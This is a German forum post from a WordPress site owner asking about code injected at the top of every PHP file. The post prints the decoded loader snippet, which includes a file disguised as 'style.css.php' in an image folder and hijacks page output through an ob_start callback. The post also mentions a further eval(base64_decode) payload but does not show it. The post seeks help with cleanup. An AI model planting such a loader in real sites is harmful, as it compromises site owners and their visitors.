Hallo zusammen,
mir ist aufgefallen, dass seit kurzer Zeit in sämtlichen PHP-Docs zu Beginn ein Text steht, der folgendermaßen beginnt:
Ich habe mir den Text auch dekodiert, kann ihn aber immer noch nicht verstehen. Ich stelle den Text hier anonymisiert rein:
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/kunden/homepages/10/dxxxxx/htdocs/xxxx-blog/wordpress/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}
Der Pfad, der hier angegeben ist, führt zu einem CSS.php-Dokument, das wiederum einen viel längeren eval(base64_decode...)-Text enthält, den ich bisher nicht dekodieren kann.
Interessanterweise sind in dem Ordner, in dem das Dokument liegt, lediglich gifs (ältere Back-Ups zeigen auch, dass es bis vor zwei Monaten tatsächlich nur gifs in diesem Ordner gab)
Ich würde mich freuen, wenn mir jemand erklären kann, was dieser Text bedeutet, ob das gefährlich ist und bspw. mit dem Plug-In "Antivirus für Wordpress" die Dateien wieder zu bereinigen sind?